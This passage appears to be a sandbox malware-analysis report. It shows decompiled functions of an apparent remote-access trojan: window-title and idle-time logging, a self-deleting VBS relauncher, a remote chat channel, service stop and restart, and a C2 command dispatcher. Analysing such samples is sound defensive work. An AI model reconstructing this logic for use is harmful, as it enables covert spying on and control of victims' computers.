                                    											_v44 = _t266 & 0x7fffffff;
                                    											_t215 = 6;
                                    											_push( &_v24);
                                    											_push(_a12);
                                    											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
                                    											_t245 = L0044EF23();
                                    											__eflags = _t245 - 0xffffffff;
                                    											if(_t245 != 0xffffffff) {
                                    												_t217 =  *_t190;
                                    												_t219 = (_t217 & 0x0000003f) * 0x30;
                                    												__eflags = _t219;
                                    												 *((intOrPtr*)( *((intOrPtr*)(0x46b800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
                                    												goto L31;
                                    											}
                                    											E0043A4CE(GetLastError());
                                    											 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                                    											L00448687( *_t190);
                                    											L10:
                                    											goto L2;
                                    										}
                                    									}
                                    									_t269 = _t134;
                                    									goto L22;
                                    								} else {
                                    									_t269 = E0044F134(_t205,  *_t190);
                                    									__eflags = _t269;
                                    									if(__eflags != 0) {
                                    										L22:
                                    										L0044551E(__eflags,  *_t190);
                                    										return _t269;
                                    									}
                                    									goto L20;
                                    								}
                                    							}
                                    							_t270 = GetLastError();
                                    							E0043A4CE(_t270);
                                    							 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                                    							CloseHandle(_t252);
                                    							__eflags = _t270;
                                    							if(_t270 == 0) {
                                    								 *((intOrPtr*)(L0043A504())) = 0xd;
                                    							}
                                    							goto L2;
                                    						}
                                    						_t234 = _v44;
                                    						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                                    						if((_t234 & 0xc0000000) != 0xc0000000) {
                                    							L9:
                                    							_t235 =  *_t190;
                                    							_t237 = (_t235 & 0x0000003f) * 0x30;
                                    							_t180 =  *((intOrPtr*)(0x46b800 + (_t235 >> 6) * 4));
                                    							_t33 = _t180 + _t237 + 0x28;
                                    							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                                    							__eflags =  *_t33;
                                    							E0043A4CE(GetLastError());
                                    							goto L10;
                                    						}
                                    						__eflags = _a16 & 0x00000001;
                                    						if((_a16 & 0x00000001) == 0) {
                                    							goto L9;
                                    						}
                                    						_t284 = _t277 - 0x18;
                                    						_v44 = _t234 & 0x7fffffff;
                                    						_t239 = 6;
                                    						_push( &_v24);
                                    						_push(_a12);
                                    						memcpy(_t284,  &_v48, _t239 << 2);
                                    						_t197 = 0;
                                    						_t252 = L0044EF23();
                                    						_t277 = _t284 + 0x2c;
                                    						_v12 = _t252;
                                    						__eflags = _t252 - 0xffffffff;
                                    						if(_t252 != 0xffffffff) {
                                    							goto L11;
                                    						}
                                    						goto L9;
                                    					} else {
                                    						 *(E0043A4F1()) =  *_t186 & 0x00000000;
                                    						 *_t190 = _t263;
                                    						 *((intOrPtr*)(L0043A504())) = 0x18;
                                    						goto L2;
                                    					}
                                    				} else {
                                    					 *(E0043A4F1()) =  *_t188 & 0x00000000;
                                    					 *_a8 = _t263;
                                    					L2:
                                    					return  *((intOrPtr*)(L0043A504()));
                                    				}
                                    			}
                                    0x0044f278
                                    0x0044f27c
                                    0x0044f27d
                                    0x0044f27d
                                    0x0044f27d
                                    0x0044f27f
                                    0x0044f285
                                    0x0044f2a0
                                    0x0044f2a5
                                    0x0044f2a8
                                    0x0044f2aa
                                    0x0044f2ac
                                    0x0044f2cb
                                    0x0044f2d2
                                    0x0044f2d9
                                    0x0044f2dc
                                    0x0044f2e8
                                    0x0044f2eb
                                    0x0044f2f3
                                    0x0044f2f4
                                    0x0044f2f7
                                    0x0044f2f7
                                    0x0044f2fe
                                    0x0044f300
                                    0x0044f303
                                    0x0044f30b
                                    0x0044f30e
                                    0x0044f37b
                                    0x0044f37c
                                    0x0044f382
                                    0x0044f384
                                    0x0044f3cd
                                    0x0044f3d0
                                    0x0044f3d9
                                    0x0044f3dc
                                    0x0044f3df
                                    0x0044f3e1
                                    0x0044f3e1
                                    0x0044f3e1
                                    0x0044f3d2
                                    0x0044f3d5
                                    0x0044f3d5
                                    0x0044f3e6
                                    0x0044f3e9
                                    0x0044f3f5
                                    0x0044f3fa
                                    0x0044f406
                                    0x0044f410
                                    0x0044f414
                                    0x0044f41e
                                    0x0044f421
                                    0x0044f42c
                                    0x0044f431
                                    0x0044f441
                                    0x0044f444

                                    APIs
                                      • Part of subcall function 0044EF23: CreateFileW.KERNEL32(00000000,00000000,?,0044F2FE,?,?,00000000,?,0044F2FE,00000000,0000000C), ref: 0044EF40
                                    • GetLastError.KERNEL32 ref: 0044F369
                                    • __dosmaperr.LIBCMT ref: 0044F370
                                    • GetFileType.KERNEL32(00000000), ref: 0044F37C
                                    • GetLastError.KERNEL32 ref: 0044F386
                                    • __dosmaperr.LIBCMT ref: 0044F38F
                                    • CloseHandle.KERNEL32(00000000), ref: 0044F3AF
                                    • CloseHandle.KERNEL32(?), ref: 0044F4F9
                                    • GetLastError.KERNEL32 ref: 0044F52B
                                    • __dosmaperr.LIBCMT ref: 0044F532
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    • API String ID: 4237864984-2852464175
                                    • Opcode ID: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
                                    • Instruction ID: 8387d8c7474957efea47537ed2c3f831a95fafc38b1db0bb8119202e772c3410
                                    • Opcode Fuzzy Hash: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
                                    • Instruction Fuzzy Hash: 18A15A32A105489FEF19DF68D8417AE7BA0EB06324F14016EF801DB392DB799D16CB5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E00409195(void* __ecx, void* __edx) {
                                    				char _v28;
                                    				char _v56;
                                    				char _v76;
                                    				char _v80;
                                    				char _v100;
                                    				void* _v104;
                                    				char _v108;
                                    				char _v112;
                                    				struct HWND__* _v116;
                                    				void* __ebx;
                                    				void* __edi;
                                    				int _t36;
                                    				struct HWND__* _t42;
                                    				void* _t50;
                                    				int _t57;
                                    				struct HWND__* _t77;
                                    				void* _t119;
                                    				signed int _t125;
                                    				void* _t127;
                                    
                                    				_t112 = __edx;
                                    				_t127 = (_t125 & 0xfffffff8) - 0x74;
                                    				_push(_t77);
                                    				_push(0xea60);
                                    				_t119 = __ecx;
                                    				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                                    					Sleep(0x1f4);
                                    					_t77 = GetForegroundWindow();
                                    					_t36 = GetWindowTextLengthW(_t77);
                                    					_t4 = _t36 + 1; // 0x1
                                    					L00409DEC(_t77,  &_v100, _t112, _t119, _t4, 0);
                                    					if(_t36 != 0) {
                                    						_t57 = E00402489();
                                    						GetWindowTextW(_t77, L00401EEB( &_v100), _t57);
                                    						_t112 = 0x46dd0c;
                                    						if(L00409EAC(0x46dd0c) == 0) {
                                    							L00409DD2(0x46dd0c,  &_v100);
                                    							E0040733F(E00402489() - 1);
                                    							_t127 = _t127 - 0x18;
                                    							_t136 =  *0x46c39b;
                                    							if( *0x46c39b == 0) {
                                    								_t112 = L00409E69( &_v76, L"\r\n[ ", __eflags,  &_v108);
                                    								E004030A6(_t77, _t127, _t67, _t119, __eflags, L" ]\r\n");
                                    								L00408B80(_t119);
                                    								L00401EF0();
                                    							} else {
                                    								E00407350(_t77, _t127, 0x46dd0c, _t136,  &_v108);
                                    								L00409634(_t77, _t119, _t136);
                                    							}
                                    						}
                                    					}
                                    					_t83 = _t119;
                                    					L00409C15(_t119);
                                    					if(E004171D6(_t119) < 0xea60) {
                                    						L18:
                                    						L00401EF0();
                                    						continue;
                                    					} else {
                                    						_t77 = _v116;
                                    						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                                    							_t42 = E004171D6(_t83);
                                    							if(_t42 < 0xea60) {
                                    								__eflags = _t77 % 0xea60;
                                    								L0043BACE(_t83, _t77 / 0xea60,  &_v112, 0xa);
                                    								_t50 = E00405343(_t77,  &_v80, L004075C2(_t77,  &_v56, "\r\n{ User has been idle for ", _t119, __eflags, E00402084(_t77,  &_v28,  &_v112)), _t119, __eflags, " minutes }\r\n");
                                    								_t127 = _t127 + 0xc - 0x14;
                                    								_t112 = _t50;
                                    								E004172DA(_t127, _t50);
                                    								L00408B80(_t119);
                                    								L00401FC7();
                                    								L00401FC7();
                                    								L00401FC7();
                                    								goto L18;
                                    							}
                                    							_t77 = _t42;
                                    							_v116 = _t77;
                                    							Sleep(0x3e8);
                                    						}
                                    						L00401EF0();
                                    						break;
                                    					}
                                    				}
                                    				__eflags = 0;
                                    				return 0;
                                    			}

                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004091F7
                                    • Sleep.KERNEL32(000001F4), ref: 00409202
                                    • GetForegroundWindow.USER32 ref: 00409208
                                    • GetWindowTextLengthW.USER32(00000000), ref: 00409211
                                    • GetWindowTextW.USER32 ref: 00409245
                                    • Sleep.KERNEL32(000003E8), ref: 00409313
                                      • Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79
                                      • Part of subcall function 00408B80: SetEvent.KERNEL32(?,?,?,?,00409CFC,?,?,?,?,?,00000000), ref: 00408BAD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
                                    • String ID: [ ${ User has been idle for $ ]$ minutes }
                                    • API String ID: 107669343-3343415809
                                    • Opcode ID: a6c8a928903d92f7d9192b5741854bc834aefe436945cdbf5aa3212f8be8680a
                                    • Instruction ID: 503b2ce70374cf4332f5393007fb2740c98398301deed75f23da1ef1a57f7c11
                                    • Opcode Fuzzy Hash: a6c8a928903d92f7d9192b5741854bc834aefe436945cdbf5aa3212f8be8680a
                                    • Instruction Fuzzy Hash: A251D3716082415BC314FB25D846A6E77A5AF84348F44093FF842A62E3EF7C9E45C69E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0040B488(void* __ebx, void* __eflags) {
                                    				char _v28;
                                    				char _v52;
                                    				char _v76;
                                    				char _v100;
                                    				char _v124;
                                    				char _v148;
                                    				char _v172;
                                    				char _v196;
                                    				short _v716;
                                    				void* __edi;
                                    				void* __ebp;
                                    				void* _t36;
                                    				void* _t37;
                                    				void* _t40;
                                    				void* _t54;
                                    				void* _t67;
                                    				void* _t68;
                                    				void* _t79;
                                    
                                    				_t79 = __ebx;
                                    				E0041015B();
                                    				_t36 = E00402489();
                                    				_t37 = L00401F95(0x46c560);
                                    				_t40 = L00410A30(L00401F95(0x46c518), "exepath",  &_v716, 0x208, _t37, _t36);
                                    				_t140 = _t40;
                                    				if(_t40 == 0) {
                                    					GetModuleFileNameW(0,  &_v716, 0x208);
                                    				}
                                    				E004030A6(_t79,  &_v124, E004172DA( &_v52, E00417093( &_v76)), 0, _t140, L".vbs");
                                    				L00401EF0();
                                    				L00401FC7();
                                    				E00404429(_t79,  &_v100, E004030A6(_t79,  &_v76, E0040427F(_t79,  &_v52, L0043987F(_t79,  &_v76, _t140, L"Temp")), 0, _t140, "\\"), _t140,  &_v124);
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401F6D(_t79,  &_v28);
                                    				_t54 = E0040427F(_t79,  &_v196, L"\"\"\", 0");
                                    				E00403311(E004030A6(_t79,  &_v76, E00403030( &_v52, E004030A6(_t79,  &_v148, E0040427F(_t79,  &_v172, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t140,  &_v716), _t54), 0, _t140, "\n"));
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L0040766C(_t79,  &_v28, 0, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
                                    				_t67 = L00401EEB( &_v100);
                                    				_t68 = E00402489();
                                    				if(L00417947(L00401EEB( &_v28), _t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", L00401EEB( &_v100), 0x45f724, 0x45f724, 0) > 0x20) {
                                    					ExitProcess(0);
                                    				}
                                    				L00401EF0();
                                    				L00401EF0();
                                    				return L00401EF0();
                                    			}

                                    APIs
                                      • Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
                                      • Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E
                                      • Part of subcall function 00410A30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
                                      • Part of subcall function 00410A30: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
                                      • Part of subcall function 00410A30: RegCloseKey.ADVAPI32(00000000), ref: 00410A70
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B4E2
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B641
                                    • ExitProcess.KERNEL32 ref: 0040B64D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                    • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                    • API String ID: 1913171305-2411266221
                                    • Opcode ID: 99087979b48af51e1bd60e67a26d4a29e487769374ba6779ba1c7c4bd500808e
                                    • Instruction ID: 1eb9c9899973781d748da32130d6708d7247d8467cae5aa57bbac03f0cab9b6b
                                    • Opcode Fuzzy Hash: 99087979b48af51e1bd60e67a26d4a29e487769374ba6779ba1c7c4bd500808e
                                    • Instruction Fuzzy Hash: C74150319101185ACB14FB61DC92DEE7779AF60748F10007FF806721E2EF385E4ACA99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 76%
                                    			E004053ED(char* __edx, void* __eflags, intOrPtr _a4) {
                                    				struct tagMSG _v52;
                                    				void* _v56;
                                    				char _v60;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v104;
                                    				char _v108;
                                    				void* _v112;
                                    				char _v116;
                                    				char _v120;
                                    				char _v140;
                                    				void* _v176;
                                    				void* __ebx;
                                    				void* __ebp;
                                    				intOrPtr* _t28;
                                    				char* _t36;
                                    				intOrPtr _t45;
                                    				intOrPtr _t46;
                                    				void* _t57;
                                    				intOrPtr _t69;
                                    				void* _t111;
                                    				void* _t113;
                                    				void* _t115;
                                    				signed int _t117;
                                    				void* _t120;
                                    				void* _t121;
                                    				void* _t122;
                                    				void* _t123;
                                    
                                    				_t125 = __eflags;
                                    				_t101 = __edx;
                                    				_t69 = _a4;
                                    				E004020EC(_t69,  &_v104, __edx, __eflags, _t69 + 0x1c);
                                    				SetEvent( *(_t69 + 0x34));
                                    				_t28 = L00401F95( &_v108);
                                    				E004042A6( &_v108,  &_v60, 4, 0xffffffff);
                                    				_t120 = (_t117 & 0xfffffff8) - 0x5c;
                                    				E004020EC(_t69, _t120, _t101, _t125, 0x46c238);
                                    				_t121 = _t120 - 0x18;
                                    				E004020EC(_t69, _t121, _t101, _t125,  &_v76);
                                    				E00417478( &_v140, _t101);
                                    				_t122 = _t121 + 0x30;
                                    				_t111 =  *_t28 - 0x3a;
                                    				if(_t111 == 0) {
                                    					L00401E49( &_v116, _t101, __eflags, 0);
                                    					_t36 = E00402489();
                                    					L00401F95(L00401E49( &_v120, _t101, __eflags, 0));
                                    					_t101 = _t36;
                                    					_t113 = L0040F69B();
                                    					__eflags = _t113;
                                    					if(_t113 == 0) {
                                    						L7:
                                    						L00401E74( &_v116, _t101);
                                    						L00401FC7();
                                    						L00401FC7();
                                    						__eflags = 0;
                                    						return 0;
                                    					}
                                    					 *0x46baec = L0040F931(_t113, "DisplayMessage");
                                    					_t45 = L0040F931(_t113, "GetMessage");
                                    					_t104 = "CloseChat";
                                    					 *0x46bae4 = _t45;
                                    					_t46 = L0040F931(_t113, "CloseChat");
                                    					_t123 = _t122 - 0x18;
                                    					 *0x46bae8 = _t46;
                                    					 *0x46bae1 = 1;
                                    					E004020EC(_t69, _t123, "CloseChat", __eflags, 0x46c2b8);
                                    					_push(0x74);
                                    					L00404AA4(_t69, _t69, _t104, __eflags);
                                    					L10:
                                    					_t115 = HeapCreate(0, 0, 0);
                                    					__eflags =  *0x46bae4(_t115,  &_v140);
                                    					if(__eflags != 0) {
                                    						_t123 = _t123 - 0x18;
                                    						E004020AB(_t69, _t123, _t104, __eflags, _v140, _t51);
                                    						_push(0x3b);
                                    						L00404AA4(_t69, _t69, _t104, __eflags);
                                    						HeapFree(_t115, 0, _v176);
                                    					}
                                    					goto L10;
                                    				}
                                    				_t127 = _t111 != 1;
                                    				if(_t111 != 1) {
                                    					goto L7;
                                    				}
                                    				_t57 =  *0x46baec(L00401F95(L00401E49( &_v116, _t101, _t127, 0)));
                                    				_t128 = _t57;
                                    				if(_t57 == 0) {
                                    					goto L7;
                                    				}
                                    				E0040427F(_t69,  &_v80, 0x45f6b8);
                                    				_t101 =  &_v84;
                                    				E0041739C(_t69, _t122 - 0x18,  &_v84);
                                    				_push(0x3b);
                                    				L00404AA4(_t69, _t69,  &_v84, _t128);
                                    				L00401EF0();
                                    				L4:
                                    				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
                                    					TranslateMessage( &_v52);
                                    					DispatchMessageA( &_v52);
                                    				}
                                    				if(__eflags < 0) {
                                    					goto L4;
                                    				}
                                    				goto L7;
                                    			}

                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 0040540C
                                    • GetMessageA.USER32 ref: 004054BC
                                    • TranslateMessage.USER32(?), ref: 004054CB
                                    • DispatchMessageA.USER32 ref: 004054D6
                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046C2B8), ref: 0040558E
                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 004055C6
                                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                    • API String ID: 2956720200-749203953
                                    • Opcode ID: b020ac9687932918c040d728d7396064027af0599af881cd7dcd59637a7a5ecb
                                    • Instruction ID: 33c0be49a712d0e34ef4d1a509f5b181f9b779c8c834d9e011c7c8049845a3e0
                                    • Opcode Fuzzy Hash: b020ac9687932918c040d728d7396064027af0599af881cd7dcd59637a7a5ecb
                                    • Instruction Fuzzy Hash: DF41B371604300ABCA14FB76DD4A96F77A99B85704B40093FF911A75E2EF3C8909CB9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 93%
                                    			E00416472(char _a4) {      // _a4: service name (wide string) supplied by the caller
                                    				intOrPtr _v28;            // == _v32.dwCurrentState (offset 4 of SERVICE_STATUS)
                                    				struct _SERVICE_STATUS _v32;
                                    				int _t22;                 // return code: 0 = service not opened, 2 = stop failed, 3 = stop/start issued
                                    				void* _t26;
                                    				void* _t27;
                                    
                                    				_t22 = 0;
                                    				_t27 = OpenSCManagerW(0, 0, 0x11);                        // SC_MANAGER_CONNECT | SC_MANAGER_QUERY_LOCK_STATUS
                                    				_t26 = OpenServiceW(_t27, L00401EEB( &_a4), 0xf003f);    // 0xF003F = SERVICE_ALL_ACCESS
                                    				if(_t26 != 0) {
                                    					if(ControlService(_t26, 1,  &_v32) != 0) {            // 1 = SERVICE_CONTROL_STOP; fails if already stopped, not stoppable or access denied
                                    						do {                                              // busy-poll: no Sleep and no timeout
                                    							QueryServiceStatus(_t26,  &_v32);
                                    						} while (_v28 != 1);                              // 1 = SERVICE_STOPPED
                                    						StartServiceW(_t26, 0, 0);
                                    						asm("sbb ebx, ebx");                              // not folded by the decompiler; the return value may depend on StartServiceW's result
                                    						_t22 = 3;
                                    						CloseServiceHandle(_t27);
                                    						CloseServiceHandle(_t26);
                                    					} else {
                                    						CloseServiceHandle(_t27);
                                    						CloseServiceHandle(_t26);
                                    						_t22 = 2;
                                    					}
                                    				} else {
                                    					CloseServiceHandle(_t27);                         // SCM handle closed; the null service handle is not
                                    				}
                                    				L00401EF0();
                                    				return _t22;
                                    			}

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00415E19,00000000), ref: 00416481
                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00415E19,00000000), ref: 00416498
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164A5
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415E19,00000000), ref: 004164B4
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C8
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
                                    • Instruction ID: 9fe600a8707d0c96f8df9479574b059baa9e236c1ba3853f5d66e3923bac8ba5
                                    • Opcode Fuzzy Hash: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
                                    • Instruction Fuzzy Hash: 381182319403187BD721AF64DC89DFF3B7CDB45BA3700013AF90592192DB68DE46AAA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 83%
                                    			E004123B9(void* __ebx, CHAR* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a36, intOrPtr _a37, intOrPtr _a41, intOrPtr _a47, char _a61) {
                                    				char _v116;
                                    				char _v120;
                                    				char _v140;
                                    				char _v156;
                                    				char _v164;
                                    				void* _v172;
                                    				char _v192;
                                    				void* _v196;
                                    				char _v212;
                                    				char _v216;
                                    				void* _v220;
                                    				char _v240;
                                    				void* _v244;
                                    				char _v252;
                                    				char _v264;
                                    				void* _v268;
                                    				void* _v284;
                                    				char _v288;
                                    				void* _v292;
                                    				char _v304;
                                    				char _v308;
                                    				char _v312;
                                    				char _v336;
                                    				char _v340;
                                    				char _v344;
                                    				char _v348;
                                    				char _v364;
                                    				char _v368;
                                    				long _v372;
                                    				int _v376;
                                    				char _v396;
                                    				char _v400;
                                    				void* _v404;
                                    				int _v408;
                                    				char _v412;
                                    				char _v416;
                                    				char _v420;
                                    				char _v424;
                                    				char _v428;
                                    				char _v432;
                                    				char _v436;
                                    				char _v440;
                                    				char _v444;
                                    				char _v452;
                                    				char _v500;
                                    				char _v504;
                                    				void* __esi;
                                    				void* _t244;
                                    				void* _t246;
                                    				intOrPtr _t374;
                                    				intOrPtr _t375;
                                    				void* _t376;
                                    				void* _t378;
                                    				signed int _t379;
                                    				signed int _t385;
                                    				void* _t388;
                                    				void* _t389;
                                    				void* _t390;
                                    				void* _t394;
                                    				void* _t400;
                                    
                                    				_t399 = __eflags;
                                    				_t360 = __edx;
                                    				_t294 = __ebx;
                                    				_push(__ebx);
                                    				_t374 = _a4;
                                    				E004020EC(__ebx,  &_v308, __edx, __eflags, _t374 + 0x1c);
                                    				SetEvent( *(_t374 + 0x34));
                                    				_t375 =  *((intOrPtr*)(L00401F95( &_v312)));
                                    				E004042A6( &_v312,  &_v288, 4, 0xffffffff);
                                    				_t388 = (_t385 & 0xfffffff8) - 0x18c;
                                    				E004020EC(__ebx, _t388, _t360, _t399, 0x46c238);
                                    				_t389 = _t388 - 0x18;
                                    				E004020EC(__ebx, _t389, _t360, _t399,  &_v304);
                                    				E00417478( &_v444, _t360);
                                    				_t390 = _t389 + 0x30;
                                    				_t400 = _t375 - 0x8f;                 // _t375: command id taken from the received C2 message
                                    				if(_t400 > 0) {                       // ids above 0x8f use the upper dispatch table
                                    					_t376 = _t375 + 0xffffff70;       // id - 0x90
                                    					__eflags = _t376 - 0x22;
                                    					if(__eflags <= 0) {               // 0x90..0xb2 are handled; higher ids fall through to L120 (cleanup, return 0)
                                    						switch( *((intOrPtr*)(( *(_t376 + 0x413511) & 0x000000ff) * 4 +  &M004134C5))) {   // byte table at 0x413511 maps the id to a case index; jump table at M004134C5
                                    							case 0:
                                    								__ecx =  &_v420;
                                    								__ecx = L00401E49( &_v420, __edx, __eflags, 0);
                                    								__eax = L00401F95(__ecx);
                                    								__ecx = __eax;
                                    								__eax = L00407F83(__ecx);
                                    								goto L120;
                                    							case 1:
                                    								__ecx =  &_v420;
                                    								__ecx = L00401E49( &_v420, __edx, __eflags, 0);
                                    								__eax = L00401F95(__eax);
                                    								__eax = StrToIntA(__eax);
                                    								__ecx =  &_v424;
                                    								__edi = __eax;
                                    								__ecx = L00401E49( &_v424, __edx, __eflags, 1);
                                    								__eax = L00401F95(__eax);
                                    								__dl = 0x30;
                                    								__ecx =  &_v408;
                                    								__eax = E0041805B( &_v408, __edx, __eax);
                                    								__ecx =  &_v408;
                                    								__eax = L00401EEB( &_v408);
                                    								__ecx =  &_v428;
                                    								__esi = __eax;
                                    								__eax = L00401E49( &_v428, __edx, __eflags, 2);
                                    								__esp = __esp - 0x18;
                                    								__ecx = __esp;
                                    								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
                                    								__ecx = __esi;
                                    								__eax = L00417A4E(__esi);
                                    								__esp = __esp + 0x18;
                                    								__ecx =  &_v416;
                                    								__edx = L00401EEB( &_v416);
                                    								__ecx = __edi;
                                    								__eax = L00417F10(__edi, __edx);
                                    								goto L100;
                                    							case 2:
                                    								__ecx =  &_v420;
                                    								__ecx = L00401E49( &_v420, __edx, __eflags, 1);
                                    								__eax = L00401F95(__eax);
                                    								__ecx =  &_v424;
                                    								__ecx = L00401E49( &_v424, __edx, __eflags, 0);
                                    								__eax = L00401F95(__ecx);
                                    								__eax = SetWindowTextW(__eax, __eax);
                                    								goto L20;
                                    							case 3:
                                    								__ecx =  &_v420;
                                    								__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    								__esp = __esp - 0x18;
                                    								__ecx = __esp;
                                    								__eax = E00413545(__ebx, __edx);
                                    								goto L97;
                                    							case 4:
                                    								__ecx =  &_v420;
                                    								__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    								__esp = __esp - 0x18;
                                    								__ecx = __esp;
                                    								__eax = L00413673(__ecx, __eflags);
                                    								goto L97;
                                    							case 5:
                                    								E004020EC(__ebx, _t390 - 0x18, _t360, __eflags, L00401E49( &_v420, _t360, __eflags, 0));
                                    								L0040691F(_t360);
                                    								goto L97;
                                    							case 6:
                                    								__ecx =  &_v420;
                                    								__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    								__esp = __esp - 0x18;
                                    								__ecx = __esp;
                                    								__eax = E00415397(__edx);
                                    								goto L97;
                                    							case 7:
                                    								__ecx =  &_v420;
                                    								__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    								__esp = __esp - 0x18;
                                    								__ecx = __esp;
                                    								__eax = E00404013(__edx);
                                    								goto L97;
                                    							case 8:
                                    								__eax = L0041667F(__ebx);
                                    								goto L120;
                                    							case 9:
                                    								__eax = L004167AD(__ebx, __eflags);
                                    								goto L120;
                                    							case 0xa:
                                    								__eax = L004167EA(__eax);
                                    								goto L120;
                                    							case 0xb:
                                    								__ebx = 0;
                                    								__ecx =  &_v420;
                                    								__ecx = L00401E49( &_v420, __edx, __eflags, 0);
                                    								__eax = E00405220(0);
                                    								__ecx =  &_v428;
                                    								__eflags =  *__eax - __bl;
                                    								__ebx = 0 | __eflags != 0x00000000;
                                    								__eax = L00401E49( &_v428, __edx, __eflags, 1);
                                    								__dl = __bl;
                                    								__ecx = __eax;
                                    								__eax = L0041678C(__ecx, __edx, __edi, __esi);
                                    								goto L120;
                                    							case 0xc:
                                    								__eax = L004167F2(__edx);
                                    								goto L120;
                                    							case 0xd:
                                    								__eax = L00405F77(__ebx, __ecx, __edx);
